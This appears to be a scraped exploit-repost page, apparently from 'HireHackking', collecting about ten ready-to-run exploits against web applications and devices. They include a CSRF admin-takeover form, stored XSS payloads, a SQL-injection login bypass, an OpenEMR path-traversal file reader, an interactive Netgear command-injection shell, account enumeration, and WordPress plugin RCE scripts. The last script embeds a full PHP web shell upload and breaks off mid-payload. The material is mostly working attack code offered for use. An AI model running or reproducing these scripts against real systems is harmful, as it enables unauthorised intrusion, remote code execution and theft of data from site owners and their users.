__gads=ID=b3a3eb6f723d6f76-2210340b6fc800b7:T=1625137656:RT=1625137656:S=ALNI_MaB1e9iPH5NWYZhtIxGIyqg8LXMOA User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded Content-Length: 1031 Origin: https://s2.demo.opensourcecms.com Referer: https://s2.demo.opensourcecms.com/b2evolution/evoadm.php?blog=1&ctrl=user&user_tab=profile&user_ID=1&action=edit&user_tab=profile Upgrade-Insecure-Requests: 1 Te: trailers Connection: close ## < SNIPP > edited_user_login=opensourcecms&edited_user_firstname=Hacker&edited_user_lastname=Hacker&edited_user_nickname=demo&edited_user_gender=M&edited_user_ctry_ID=233&edited_user_rgn_ID=&edited_user_subrg_ID=&edited_user_city_ID= &edited_user_age_min=&edited_user_age_max=&edited_user_birthday_month=&edited_user_birthday_day=&edited_user_birthday_year=&organizations%5B%5D=1&org_roles%5B%5D=King+of+Spades&org_priorities%5B%5D=&uf_1=I+am+the+demo+administrator+of+this+site.%0D%0AI+love+having+so+much+power%21&uf_new%5B2%5D%5B%5D= &uf_new%5B3%5D%5B%5D=&uf_2=https%3A%2F%2Ftwitter.com%2Fb2evolution%2F&uf_3=https%3A%2F%2Fwww.facebook.com%2Fb2evolution&uf_4=https%3A%2F%2Fplus.google.com%2F%2Bb2evolution%2Fposts&uf_5=https%3A%2F%2Fwww.linkedin.com%2Fcompany%2Fb2evolution-net&uf_6=https%3A%2F%2Fgithub.com%2Fb2evolution%2Fb2evolution&uf_7= http%3A%2F%2Fb2evolution.net%2F&new_field_type=0&actionArray%5Bupdate%5D=Save+Changes%21&crumb_user=zNkyQhORGCWRoCFgM0JhdvYkrqnYpCOl&ctrl=user&user_tab=profile&identity_form=1&user_ID=1&orig_user_ID=1 #### Proof-Of-Concept #### <html> <body> <script>history.pushState('', '', '/')</script> <form action="https://s2.demo.opensourcecms.com/b2evolution/evoadm.php" method="POST"> <input type="hidden" name="edited&#95;user&#95;login" value="CHANGEHERE" /> <input type="hidden" name="edited&#95;user&#95;firstname" value="CHANGEHERE" /> <input type="hidden" name="edited&#95;user&#95;lastname" value="CHANGEHERE" /> <input type="hidden" name="edited&#95;user&#95;nickname" value="CHANGEHERE" /> <input type="hidden" name="edited&#95;user&#95;gender" value="M" /> <input type="hidden" name="edited&#95;user&#95;ctry&#95;ID" value="233" /> <input type="hidden" name="edited&#95;user&#95;rgn&#95;ID" value="" /> <input type="hidden" name="edited&#95;user&#95;subrg&#95;ID" value="" /> <input type="hidden" name="edited&#95;user&#95;city&#95;ID" value="" /> <input type="hidden" name="edited&#95;user&#95;age&#95;min" value="" /> <input type="hidden" name="edited&#95;user&#95;age&#95;max" value="" /> <input type="hidden" name="edited&#95;user&#95;birthday&#95;month" value="" /> <input type="hidden" name="edited&#95;user&#95;birthday&#95;day" value="" /> <input type="hidden" name="edited&#95;user&#95;birthday&#95;year" value="" /> <input type="hidden" name="organizations&#91;&#93;" value="1" /> <input type="hidden" name="org&#95;roles&#91;&#93;" value="King&#32;of&#32;Spades" /> <input type="hidden" name="org&#95;priorities&#91;&#93;" value="" /> <input type="hidden" name="uf&#95;1" value="I&#32;am&#32;the&#32;demo&#32;administrator&#32;of&#32;this&#32;site&#46;&#13;&#10;I&#32;love&#32;having&#32;so&#32;much&#32;power&#33;" /> <input type="hidden" name="uf&#95;new&#91;2&#93;&#91;&#93;" value="" /> <input type="hidden" name="uf&#95;new&#91;3&#93;&#91;&#93;" value="" /> <input type="hidden" name="uf&#95;2" value="https&#58;&#47;&#47;twitter&#46;com&#47;b2evolution&#47;" /> <input type="hidden" name="uf&#95;3" value="https&#58;&#47;&#47;www&#46;facebook&#46;com&#47;b2evolution" /> <input type="hidden" name="uf&#95;4" value="https&#58;&#47;&#47;plus&#46;google&#46;com&#47;&#43;b2evolution&#47;posts" /> <input type="hidden" name="uf&#95;5" value="https&#58;&#47;&#47;www&#46;linkedin&#46;com&#47;company&#47;b2evolution&#45;net" /> <input type="hidden" name="uf&#95;6" value="https&#58;&#47;&#47;github&#46;com&#47;b2evolution&#47;b2evolution" /> <input type="hidden" name="uf&#95;7" value="http&#58;&#47;&#47;b2evolution&#46;net&#47;" /> <input type="hidden" name="new&#95;field&#95;type" value="0" /> <input type="hidden" name="actionArray&#91;update&#93;" value="Save&#32;Changes&#33;" /> <input type="hidden" name="crumb&#95;user" value="zNkyQhORGCWRoCFgM0JhdvYkrqnYpCOl" /> <input type="hidden" name="ctrl" value="user" /> <input type="hidden" name="user&#95;tab" value="profile" /> <input type="hidden" name="identity&#95;form" value="1" /> <input type="hidden" name="user&#95;ID" value="1" /> <input type="hidden" name="orig&#95;user&#95;ID" value="1" /> <input type="submit" value="Submit request" /> </form> </body> </html>
HireHackking
# Exploit Title: WordPress Plugin WP Learn Manager 1.1.2 - Stored Cross-Site Scripting (XSS) # Date: July 2, 2021 # Exploit Author: Mohammed Adam # Vendor Homepage: https://wplearnmanager.com/ # Software Link: https://wordpress.org/plugins/learn-manager/ # Version: 1.1.2 # References link: https://wpscan.com/vulnerability/e0182508-23f4-4bdb-a1ef-1d1be38f3ad1 *Description:* The plugin does not properly sanitise or validate its User Field Titles, allowing XSS payload to be used in them. Furthermore, no CSRF and capability checks were in place, allowing such attack to be performed either via CSRF or as any user (including unauthenticated) *Proof of Concept:* POST /wp-admin/admin.php?page=jslm_fieldordering&task=saveuserfield HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Language: en-GB,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded Content-Length: 207 Connection: close Upgrade-Insecure-Requests: 1 fieldtitle=Image%3Cscript%3Ealert%28%2FXSS%2F%29%3C%2Fscript%3E&published=1&isvisitorpublished=1&required=0&search_user=1&search_visitor=1&form_request=jslearnmanager&id=28&isuserfield=0&fieldfor=3&save=Save Then visit /wp-admin/admin.php?page=jslm_fieldordering&ff=3 as admin to trigger the XSS. It may also be triggered elsewhere
HireHackking

OpenEMR 5.0.1.7 - 'fileName' Path Traversal (Authenticated) (2)

HACKER · %s · %s

# Title: OpenEMR 5.0.1.7 - 'fileName' Path Traversal (Authenticated) (2) # Exploit author: noraj (Alexandre ZANNI) for SEC-IT (http://secit.fr) # Exploit source: https://github.com/sec-it/exploit-CVE-2019-14530 # Date: 2021-06-24 # Vendor Homepage: https://www.open-emr.org/ # Software Link: https://github.com/openemr/openemr/archive/v5_0_1_7.tar.gz # Docker PoC: https://github.com/sec-it/exploit-CVE-2019-14530/blob/master/docker-compose.yml # Version: < 5.0.2 (it means up to 5.0.1.7) # Tested on: OpenEMR Version 5.0.1 # References: https://www.exploit-db.com/exploits/50037 # CVE: CVE-2019-14530 # CWE: CWE-22 # Patch: https://github.com/openemr/openemr/pull/2592/files #!/usr/bin/env ruby require 'pathname' require 'httpx' require 'docopt' doc = <<~DOCOPT OpenEMR < 5.0.2 - (Authenticated) Path Traversal - Local File Disclosure Source: https://github.com/sec-it/exploit-CVE-2019-14530 Usage: #{__FILE__} exploit <url> <filename> <username> <password> [--debug] #{__FILE__} -h | --help Options: <url> Root URL (base path) including HTTP scheme, port and root folder <filename> Filename of the file to be read <username> Username of the admin <password> Password of the admin --debug Display arguments -h, --help Show this screen Examples: #{__FILE__} exploit http://example.org/openemr /etc/passwd admin pass #{__FILE__} exploit https://example.org:5000/ /etc/passwd admin pass DOCOPT def login(root_url, user, pass, http) vuln_url = "#{root_url}/interface/main/main_screen.php?auth=login&site=default" params = { 'new_login_session_management' => '1', 'authProvider' => 'Default', 'authUser' => user, 'clearPass' => pass, 'languageChoice' => '1' } http.post(vuln_url, form: params).body.to_s end def exploit(root_url, filename, http) vuln_url = "#{root_url}/custom/ajax_download.php?fileName=../../../../../../../../../#{filename}" http.get(vuln_url).body.to_s end begin args = Docopt.docopt(doc) pp args if args['--debug'] if args['exploit'] http = HTTPX.plugin(:cookies).plugin(:follow_redirects) login(args['<url>'], args['<username>'], args['<password>'], http) puts exploit(args['<url>'], args['<filename>'], http) end rescue Docopt::Exit => e puts e.message end
HireHackking
# Exploit Title: Netgear WNAP320 2.0.3 - 'macAddress' Remote Code Execution (RCE) (Unauthenticated) # Vulnerability: Remote Command Execution on /boardDataWW.php macAddress parameter # Notes: The RCE doesn't need to be authenticated # Date: 26/06/2021 # Exploit Author: Bryan Leong <NobodyAtall> # IoT Device: Netgear WNAP320 Access Point # Version: WNAP320 Access Point Firmware v2.0.3 import requests import sys if(len(sys.argv) != 2): print('Must specify the IP parameter') print("eg: python3 wnap320_v2_0_3.py <IP>") sys.exit(0) host = sys.argv[1] port = 80 cmd = '' while(True): cmd = input('Shell_CMD$ ') #injecting system command part writing the command output to a output file data = { 'macAddress' : '112233445566;' + cmd + ' > ./output #', 'reginfo' : '0', 'writeData' : 'Submit' } url = 'http://' + host + '/boardDataWW.php' response = requests.post(url, data=data) if(response.ok): #read the command output result url = 'http://' + host + '/output' cmdOutput = requests.get(url) print(cmdOutput.text) #remove trace cmd = 'rm ./output' data = { 'macAddress' : '112233445566;' + cmd + ' #', 'reginfo' : '0', 'writeData' : 'Submit' } url = 'http://' + host + '/boardDataWW.php' response = requests.post(url, data=data) else: print('[!] No response from the server.')
HireHackking

Apache Superset 1.1.0 - Time-Based Account Enumeration

HACKER · %s · %s

# Exploit Title: Apache Superset 1.1.0 - Time-Based Account Enumeration # Author: Dolev Farhi # Date: 2021-05-13 # Vendor Homepage: https://superset.apache.org/ # Version: 1.1.0 # Tested on: Ubuntu import sys import requests import time scheme = 'http' host = '192.168.1.1' port = 8080 # change with your wordlist usernames = ['guest', 'admin', 'administrator', 'idontexist', 'superset'] url = '{}://{}:{}'.format(scheme, host, port) login_endpoint = '/login/' session = requests.Session() def get_csrf(): token = None r = session.get(url + login_endpoint, verify=False) for line in r.text.splitlines(): if 'csrf_token' in line: try: token = line.strip().split('"')[-2] except: pass return token csrf_token = get_csrf() if not csrf_token: print('Could not obtain CSRF token, the exploit will likely fail.') sys.exit(1) data = { 'csrf_token':csrf_token, 'username':'', 'password':'abc' } attempts = {} found = False for user in usernames: start = time.time() data['username'] = user r = session.post(url + login_endpoint, data=data, verify=False, allow_redirects=True) roundtrip = time.time() - start attempts["%.4f" % roundtrip] = user print('[!] Accounts existence probability is sorted from high to low') count = 0 for key in sorted(attempts, reverse=True): count += 1 print("%s. %s (timing: %s)" % (count, attempts[key], key))
HireHackking

Online Voting System 1.0 - Authentication Bypass (SQLi)

HACKER · %s · %s

# Exploit Title: Online Voting System 1.0 - Authentication Bypass (SQLi) # Exploit Author: Salman Asad (@deathflash1411) a.k.a LeoBreaker # Date 30.06.2021 # Vendor Homepage: https://www.sourcecodester.com/ # Software Link: https://www.sourcecodester.com/php/4808/voting-system-php.html # Version 1.0 # Tested on: Ubuntu 20.04 #################### # Proof of Concept # #################### POST /Online_voting_system/admin/ HTTP/1.1 Host: localhost Content-Length: 50 Cache-Control: max-age=0 Upgrade-Insecure-Requests: 1 Origin: http://localhost Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.114 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 Referer: http://localhost/Online_voting_system/admin/ Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.9 Cookie: PHPSESSID=4ad205f46c868d2bc83e368352d0396a Connection: close UserName=admin&Password=%27+or+%27%27%3D%27&Login= ########### # Payload # ########### UserName=admin Password=' or ''='
HireHackking
# Exploit Title: Simple Traffic Offense System 1.0 - 'Multiple' Stored Cross Site Scripting (XSS) # Date: 30-06-2021 # Exploit Author: Barış Yıldızoğlu # Vendor Homepage: https://www.sourcecodester.com/ # Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/trafic.zip # Version: 1.0 # Tested on: Windows 10 Home 64 Bit + Wampserver Version 3.2.3 # Description: Almost all inputs contain Stored XSS on the website Request: POST /Trafic/save-reported.php HTTP/1.1 Host: 127.0.0.1 User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded Content-Length: 168 Origin: http://127.0.0.1 Connection: close Referer: http://127.0.0.1/Trafic/report-offence.php Cookie: PHPSESSID=vbsq5n2m09etst1mfcmq84gifo Upgrade-Insecure-Requests: 1 offence_id={Payload here}&vehicle_no={Payload here}&driver_license={Payload here}&name={Payload here}&address={Payload here}&gender={Payload here}&officer_reporting={Payload here}&offence={Payload here} # Steps to Reproduce: [1.] Login to the system [+] username=Torrahclef&pass=yemiyemi [2.] Go to the Report Offense page [3.] Send the request above with the Stored XSS payload [4.] Dashboard and Offense list pages will be triggered
HireHackking
# Exploit Title: Wordpress Plugin XCloner 4.2.12 - Remote Code Execution (Authenticated) # Date 30.06.2021 # Exploit Author: Ron Jost (Hacker5preme) # Vendor Homepage: https://www.xcloner.com/ # Software Link: https://downloads.wordpress.org/plugin/xcloner-backup-and-restore.4.2.12.zip # Version: 4.2.1 - 4.2.12 # Tested on: Ubuntu 18.04 # CVE: CVE-2020-35948 # CWE: CWE-732 # Documentation: https://github.com/Hacker5preme/Exploits/blob/main/CVE-2020-35948-Exploit/README.md ''' Description: An issue was discovered in the XCloner Backup and Restore plugin before 4.2.13 for WordPress. It gave authenticated attackers the ability to modify arbitrary files, including PHP files. Doing so would allow an attacker to achieve remote code execution. The xcloner_restore.php write_file_action could overwrite wp-config.php, for example. Alternatively, an attacker could create an exploit chain to obtain a database dump. ''' ''' Banner: ''' banner = """ ##### # # ####### ##### ### ##### ### ##### ####### ##### # ##### # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # ##### ##### ##### # # ##### # # ##### ##### ###### ###### # # ##### # # # # # # # # # # # # # ####### # # # # # # # # # # # # # # # # # # # # # # ##### # ####### ####### ### ####### ### ##### ##### ##### # ##### by @Hacker5preme """ print(banner) ''' Import required modules: ''' import requests import argparse ''' User-Input: ''' my_parser = argparse.ArgumentParser(description='Wordpress Plugin XCloner RCE (Authenticated)') my_parser.add_argument('-T', '--IP', type=str) my_parser.add_argument('-P', '--PORT', type=str) my_parser.add_argument('-U', '--PATH', type=str) my_parser.add_argument('-u', '--USERNAME', type=str) my_parser.add_argument('-p', '--PASSWORD', type=str) args = my_parser.parse_args() target_ip = args.IP target_port = args.PORT wp_path = args.PATH username = args.USERNAME password = args.PASSWORD print('') ajax_cmd = input('[*] Ajax Command to execute: ') ''' Authentication: ''' session = requests.Session() auth_url = 'http://' + target_ip + ':' + target_port + wp_path + 'wp-login.php' # Header: header = { 'Host': target_ip, 'User-Agent': 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:89.0) Gecko/20100101 Firefox/89.0', 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8', 'Accept-Language': 'de,en-US;q=0.7,en;q=0.3', 'Accept-Encoding': 'gzip, deflate', 'Content-Type': 'application/x-www-form-urlencoded', 'Origin': 'http://' + target_ip, 'Connection': 'close', 'Upgrade-Insecure-Requests': '1' } # Body: body = { 'log': username, 'pwd': password, 'wp-submit': 'Log In', 'testcookie': '1' } # Authenticate: print('') auth = session.post(auth_url, headers=header, data=body) auth_header= auth.headers['Set-Cookie'] if 'wordpress_logged_in' in auth_header: print('[+] Authentication successfull !') else: print('[-] Authentication failed !') exit() ''' Exploit: ''' url_exploit = "http://192.168.0.38:80/wordpress//wp-admin/admin-ajax.php?action=restore_backup" header = { "Accept": "*/*", "Content-Type": "multipart/form-data; boundary=------------------------08425016980d7357", "Connection": "close" } # Body: body = "--------------------------08425016980d7357\r\nContent-Disposition: form-data; name=\"xcloner_action\"\r\n\r\n%s\r\n--------------------------08425016980d7357--\r\n" % (ajax_cmd) exploit = session.post(url_exploit, headers=header, data=body) print('') print(exploit.text) print('')
HireHackking

AKCP sensorProbe SPX476 - 'Multiple' Cross-Site Scripting (XSS)

HACKER · %s · %s

# Exploit Title: AKCP sensorProbe SPX476 - 'Multiple' Cross-Site Scripting (XSS) # Date: 07-01-2021 # Exploit Author: Tyler Butler # Vendor Homepage: https://www.akcp.com/ # Software Link: https://www.akcp.com/support-center/customer-login/sensorprobe-series-firmware-download/ # Advisory: https://tbutler.org/2021/06/28/cve-2021-35956 # Version: < SP480-20210624 # CVE: CVE-2021-35956 # Description: Stored cross-site scripting (XSS) in the embedded webserver of AKCP sensorProbe before SP480-20210624 enables remote authenticated attackers to introduce arbitrary JavaScript via the Sensor Description, Email (from/to/cc), System Name, and System Location fields. 1) Stored Cross-Site Scripting via System Settings POST /system?time=32e004c941f912 HTTP/1.1 Host: [target] Content-Length: 114 Cache-Control: max-age=0 Upgrade-Insecure-Requests: 1 Origin: http://[target] Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 Referer: http://[target]/system?time=32e004c941f912 Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.9 Connection: close _SA01=System+Namer&_SA02=RDC&_SA03=Name<svg/onload=alert`xss`>&_SA04=1&_SA06=0&_SA36=0&_SA37=0&sbt1=Save 2) Stored Cross-Site Scripting via Email Settings POST /mail?time=32e004c941f912 HTTP/1.1 Host: [target] Content-Length: 162 Cache-Control: max-age=0 Upgrade-Insecure-Requests: 1 Origin: http://[target] Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 Referer: http://[target]/mail?time=32e004c941f912 Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.9 Connection: close _PS03=test@test.com&_PS04=test@test.com&_PS05_0=test@test.com&_PS05_1=test@test.comr&_PS05_3=<svg/onload=alert`xxss`>&_PS05_4=&sbt2=Save 3) Stored Cross-Site Scripting via Sensor Description POST /senswatr?index=0&time=32e004c941f912 HTTP/1.1 Host: [target] Content-Length: 55 Cache-Control: max-age=0 Upgrade-Insecure-Requests: 1 Origin: http://[target] Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 Referer: http://[target]/senswatr?index=0&time=32e004c941f912 Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.9 Cookie: CPCookie=sensors=400 Connection: close _WT00-IX="><svg/onload=alert`xss`>&_WT03-IX=2&sbt1=Save
HireHackking
# Exploit Title: Wordpress Plugin Modern Events Calendar 5.16.2 - Event export (Unauthenticated) # Date 01.07.2021 # Exploit Author: Ron Jost (Hacker5preme) # Vendor Homepage: https://webnus.net/modern-events-calendar/ # Software Link: https://downloads.wordpress.org/plugin/modern-events-calendar-lite.5.16.2.zip # Version: Before 5.16.5 # Tested on: Ubuntu 18.04 # CVE: CVE-2021-24146 # CWE: CWE-863, CWE-284 # Documentation: https://github.com/Hacker5preme/Exploits/blob/main/Wordpress/CVE-2021-24146/README.md ''' Description: Lack of authorisation checks in the Modern Events Calendar Lite WordPress plugin, versions before 5.16.5, did not properly restrict access to the export files, allowing unauthenticated users to exports all events data in CSV or XML format for example. ''' ''' Banner: ''' banner = """ _______ ________ ___ ____ ___ ___ ___ __ __ _____ __ _____ / ____/ | / / ____/ |__ \ / __ \__ \< / |__ \/ // /< / // / / ___/ / / | | / / __/________/ // / / /_/ // /_______/ / // /_/ / // /_/ __ \ / /___ | |/ / /__/_____/ __// /_/ / __// /_____/ __/__ __/ /__ __/ /_/ / \____/ |___/_____/ /____/\____/____/_/ /____/ /_/ /_/ /_/ \____/ * WordPress Plugin Modern Events Calendar Lite < 5.16.2 - Export Event Data (Unauthenticated) * @Hacker5preme """ print(banner) ''' Import required modules: ''' import requests import argparse import csv ''' User-Input: ''' my_parser = argparse.ArgumentParser(description='Wordpress Plugin Modern Events CalendarExport Event Data (Unauthenticated)') my_parser.add_argument('-T', '--IP', type=str) my_parser.add_argument('-P', '--PORT', type=str) my_parser.add_argument('-U', '--PATH', type=str) args = my_parser.parse_args() target_ip = args.IP target_port = args.PORT wp_path = args.PATH ''' Exploit: ''' print('') print('[+] Exported Data: ') print('') exploit_url = 'http://' + target_ip + ':' + target_port + wp_path + '/wp-admin/admin.php?page=MEC-ix&tab=MEC-export&mec-ix-action=export-events&format=csv' answer = requests.get(exploit_url) decoded_content = answer.content.decode('utf-8') cr = csv.reader(decoded_content.splitlines(), delimiter=',') my_list = list(cr) for row in my_list: print(row)
HireHackking
# Exploit Title: Wordpress Plugin Modern Events Calendar 5.16.2 - Remote Code Execution (Authenticated) # Date 01.07.2021 # Exploit Author: Ron Jost (Hacker5preme) # Vendor Homepage: https://webnus.net/modern-events-calendar/ # Software Link: https://downloads.wordpress.org/plugin/modern-events-calendar-lite.5.16.2.zip # Version: Before 5.16.5 # Tested on: Ubuntu 18.04 # CVE: CVE-2021-24145 # CWE: CWE-434 # Documentation: https://github.com/Hacker5preme/Exploits/blob/main/Wordpress/CVE-2021-24145/README.md ''' Description: Arbitrary file upload in the Modern Events Calendar Lite WordPress plugin, versions before 5.16.5, did not properly check the imported file, allowing PHP ones to be uploaded by administrator by using the 'text/csv' content-type in the request. ''' ''' Banner: ''' banner = """ ______ _______ ____ ___ ____ _ ____ _ _ _ _ _ ____ / ___\ \ / / ____| |___ \ / _ \___ \/ | |___ \| || | / | || || ___| | | \ \ / /| _| _____ __) | | | |__) | |_____ __) | || |_| | || ||___ \ | |___ \ V / | |__|_____/ __/| |_| / __/| |_____/ __/|__ _| |__ _|__) | \____| \_/ |_____| |_____|\___/_____|_| |_____| |_| |_| |_||____/ * Wordpress Plugin Modern Events Calendar Lite RCE * @Hacker5preme """ print(banner) ''' Import required modules: ''' import requests import argparse ''' User-Input: ''' my_parser = argparse.ArgumentParser(description='Wordpress Plugin Modern Events Calenar Lite RCE (Authenticated)') my_parser.add_argument('-T', '--IP', type=str) my_parser.add_argument('-P', '--PORT', type=str) my_parser.add_argument('-U', '--PATH', type=str) my_parser.add_argument('-u', '--USERNAME', type=str) my_parser.add_argument('-p', '--PASSWORD', type=str) args = my_parser.parse_args() target_ip = args.IP target_port = args.PORT wp_path = args.PATH username = args.USERNAME password = args.PASSWORD print('') ''' Authentication: ''' session = requests.Session() auth_url = 'http://' + target_ip + ':' + target_port + wp_path + 'wp-login.php' # Header: header = { 'Host': target_ip, 'User-Agent': 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:89.0) Gecko/20100101 Firefox/89.0', 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8', 'Accept-Language': 'de,en-US;q=0.7,en;q=0.3', 'Accept-Encoding': 'gzip, deflate', 'Content-Type': 'application/x-www-form-urlencoded', 'Origin': 'http://' + target_ip, 'Connection': 'close', 'Upgrade-Insecure-Requests': '1' } # Body: body = { 'log': username, 'pwd': password, 'wp-submit': 'Log In', 'testcookie': '1' } # Authenticate: print('') auth = session.post(auth_url, headers=header, data=body) auth_header = auth.headers['Set-Cookie'] if 'wordpress_logged_in' in auth_header: print('[+] Authentication successfull !') else: print('[-] Authentication failed !') exit() ''' Exploit: ''' exploit_url = "http://" + target_ip + ':' + target_port + wp_path + "wp-admin/admin.php?page=MEC-ix&tab=MEC-import" # Exploit Header: header = { "User-Agent": "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:89.0) Gecko/20100101 Firefox/89.0", "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8", "Accept-Language": "de,en-US;q=0.7,en;q=0.3", "Accept-Encoding": "gzip, deflate", "Content-Type": "multipart/form-data; boundary=---------------------------29650037893637916779865254589", "Origin": "http://" + target_ip, "Connection": "close", "Upgrade-Insecure-Requests": "1" } # Exploit Body: (using p0wny shell: https://github.com/flozz/p0wny-shell body = "-----------------------------29650037893637916779865254589\r\nContent-Disposition: form-data; name=\"feed\"; filename=\"shell.php\"\r\nContent-Type: text/csv\r\n\r\n<?php\n\nfunction featureShell($cmd, $cwd) {\n $stdout = array();\n\n if (preg_match(\"/^\\s*cd\\s*$/\", $cmd)) {\n // pass\n } elseif (preg_match(\"/^\\s*cd\\s+(.+)\\s*(2>&1)?$/\", $cmd)) {\n chdir($cwd);\n preg_match(\"/^\\s*cd\\s+([^\\s]+)\\s*(2>&1)?$/\", $cmd, $match);\n chdir($match[1]);\n } elseif (preg_match(\"/^\\s*download\\s+[^\\s]+\\s*(2>&1)?$/\", $cmd)) {\n chdir($cwd);\n preg_match(\"/^\\s*download\\s+([^\\s]+)\\s*(2>&1)?$/\", $cmd, $match);\n return featureDownload($match[1]);\n } else {\n chdir($cwd);\n exec($cmd, $stdout);\n }\n\n return array(\n \"stdout\" => $stdout,\n \"cwd\" => getcwd()\n );\n}\n\nfunction featurePwd() {\n return array(\"cwd\" => getcwd());\n}\n\nfunction featureHint($fileName, $cwd, $type) {\n chdir($cwd);\n if ($type == 'cmd') {\n $cmd = \"compgen -c $fileName\";\n } else {\n $cmd = \"compgen -f $fileName\";\n }\n $cmd = \"/bin/bash -c \\\"$cmd\\\"\";\n $files = explode(\"\\n\", shell_exec($cmd));\n return array(\n 'files' => $files,\n );\n}\n\nfunction featureDownload($filePath) {\n $file = @file_get_contents($filePath);\n if ($file === FALSE) {\n return array(\n 'stdout' => array('File not found / no read permission.'),\n 'cwd' => getcwd()\n );\n } else {\n return array(\n 'name' => basename($filePath),\n 'file' => base64_encode($file)\n );\n }\n}\n\nfunction featureUpload($path, $file, $cwd) {\n chdir($cwd);\n $f = @fopen($path, 'wb');\n if ($f === FALSE) {\n return array(\n 'stdout' => array('Invalid path / no write permission.'),\n 'cwd' => getcwd()\n );\n } else {\n fwrite($f, base64_decode($file));\n fclose($f);\n return array(\n 'stdout' => array('Done.'),\n 'cwd' => getcwd()\n );\n }\n}\n\nif (isset($_GET[\"feature\"])) {\n\n $response = NULL;\n\n switch ($_GET[\"feature\"]) {\n case \"shell\":\n $cmd = $_POST['cmd'];\n if (!preg_match('/2>/', $cmd)) {\n $cmd .= ' 2>&1';\n }\n $response = featureShell($cmd, $_POST[\"cwd\"]);\n break;\n case \"pwd\":\n $response = featurePwd();\n break;\n case \"hint\":\n $response = featureHint($_POST['filename'], $_POST['cwd'], $_POST['type']);\n break;\n case 'upload':\n $response = featureUpload($_POST['path'], $_POST['file'], $_POST['cwd']);\n }\n\n header(\"Content-Type: application/json\");\n echo json_encode($response);\n die();\n}\n\n?><!DOCTYPE html>\n\n<html>\n\n <head>\n <meta charset=\"UTF-8\" />\n <title>p0wny@shell:~#</title>\n <meta name=\"viewport\" content=\"width=device-width, initial-scale=1.0\" />\n <style>\n html, body {\n margin: 0;\n padding: 0;\n background: #333;\n color: #eee;\n font-family: monospace;\n }\n\n *::-webkit-scrollbar-track {\n border-radius: 8px;\n background-color: #353535;\n }\n\n *::-webkit-scrollbar {\n width: 8px;\n height: 8px;\n }\n\n *::-webkit-scrollbar-thumb {\n border-radius: 8px;\n -webkit-box-shadow: inset 0 0 6px rgba(0,0,0,.3);\n background-color: #bcbcbc;\n }\n\n #shell {\n background: #222;\n max-width: 800px;\n margin: 50px auto 0 auto;\n box-shadow: 0 0 5px rgba(0, 0, 0, .3);\n font-size: 10pt;\n display: flex;\n flex-direction: column;\n align-items: stretch;\n }\n\n #shell-content {\n height: 500px;\n overflow: auto;\n padding: 5px;\n white-space: pre-wrap;\n flex-grow: 1;\n }\n\n #shell-logo {\n font-weight: bold;\n color: #FF4180;\n text-align: center;\n }\n\n @media (max-width: 991px) {\n #shell-logo {\n font-size: 6px;\n margin: -25px 0;\n }\n\n html, body, #shell {\n height: 100%;\n width: 100%;\n max-width: none;\n }\n\n #shell {\n margin-top: 0;\n }\n }\n\n @media (max-width: 767px) {\n #shell-input {\n flex-direction: column;\n }\n }\n\n @media (max-width: 320px) {\n #shell-logo {\n font-size: 5px;\n }\n }\n\n .shell-prompt {\n font-weight: bold;\n color: #75DF0B;\n }\n\n .shell-prompt > span {\n color: #1BC9E7;\n }\n\n #shell-input {\n display: flex;\n box-shadow: 0 -1px 0 rgba(0, 0, 0, .3);\n border-top: rgba(255, 255, 255, .05) solid 1px;\n }\n\n #shell-input > label {\n flex-grow: 0;\n display: block;\n padding: 0 5px;\n height: 30px;\n line-height: 30px;\n }\n\n #shell-input #shell-cmd {\n height: 30px;\n line-height: 30px;\n border: none;\n background: transparent;\n color: #eee;\n font-family: monospace;\n font-size: 10pt;\n width: 100%;\n align-self: center;\n }\n\n #shell-input div {\n flex-grow: 1;\n align-items: stretch;\n }\n\n #shell-input input {\n outline: none;\n }\n 